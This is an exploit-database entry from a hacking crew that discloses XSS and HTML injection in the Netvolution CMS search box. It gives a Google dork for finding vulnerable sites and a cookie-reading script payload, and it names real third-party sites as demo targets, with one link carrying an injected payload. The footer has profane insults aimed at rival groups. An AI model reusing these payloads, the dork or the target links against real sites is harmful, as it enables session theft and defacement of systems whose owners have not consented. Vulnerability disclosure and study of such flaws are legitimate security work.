Netvolution Content Management System XSS/HTML Injection Vulnerability

2010-06-29T00:00:00
ID 1337DAY-ID-13067
Type zdt
Reporter **RoAd_KiLlEr**
Modified 2010-06-29T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ======================================================================
Netvolution Content Management System XSS/HTML Injection Vulnerability
======================================================================

[+]Title              Netvolution Content Management System XSS/HTML Injection Vulnerability
[+]Author          **RoAd_KiLlEr**
[+]Contact        RoAd_KiLlEr[at]Khg-Crew[dot]Ws
[+]Tested on     Win Xp Sp 2/3
---------------------------------------------------------------------------
[~] Founded by **RoAd_KiLlEr**
[~] Team: Albanian Hacking Crew
[~] Contact: RoAd_KiLlEr[at]Khg-Crew[dot]Ws 
[~] Home: http://a-h-crew.net    
[~] Download App: http://www.netvolution.net/en/Netvolution-Content-Management-System
[~] Vendor: http://www.netvolution.net/
==========ExPl0iT3d by **RoAd_KiLlEr**==========


[+] Dork: allinurl:default.asp?pid= "la="

==========================================


[+].  XSS Vulnerability
=+=+=+=+=+=+=+=+=+

Go  to any website and in the search box (its on top of webpage) put this code :  "><script>alert(document.cookie)</script>

Dem0:
~~~~~
http://www.grnet.gr/default.asp?pid=85&la=2



[+]. HTML Injection
=+=+=+=+=+=+=+=+=+

This script is also Vulnerable to HTML Injection

For HTML injection Just put this code in the search Box : ">><marquee><h1><font color=Red size=16>XSS by **RoAd_KiLlEr**</font></h1><marquee>

Dem0:
~~~~~
http://lerosmarina.gr/?option=contents&task=Search&lang=en&query=Search%22%3E%3E%3Cmarquee%3E%3Ch1%3E%3Cfont+color%3DRed+size%3D16%3EXSS+by+%2A%2ARoAd_KiLlEr%2A%2A%3C%2Ffont%3E%3C%2Fh1%3E%3Cmarquee%3E

Or

http://www.grnet.gr/default.asp?pid=85&la=2




===========================================================================================
[!] Albanian Hacking Crew           
===========================================================================================
[!] **RoAd_KiLlEr**   Says: Fuck You EraGon,Fuck Dark Hackers Team &  Mos u shti me baben se baba ta qin nanen ;)
===========================================================================================
[!] MaiL: sukihack[at]gmail[dot]com
===========================================================================================
[!] Greetz To : Ton![w]indowS | X-n3t | b4cKd00r ~ | DarKHackeR. | The|DennY` | EaglE EyE | Lekosta | KHG | THE_1NV1S1BL3 & All Albanian/Kosova Hackers 
===========================================================================================
[!] Spec Th4nks: Inj3ct0r.com | indoushka from Dz-Ghost Team | Sniper Hail 
| NEO from DATA ir Security Group | MaFFiTeRRoR | Sid3^effects | The_Exploited | And All My Friends
===========================================================================================
[!] Red n'black i dress eagle on my chest
It's good to be an ALBANIAN
Keep my head up high for that flag I die
Im proud to be an ALBANIAN
===========================================================================================



#  0day.today [2018-01-30]  #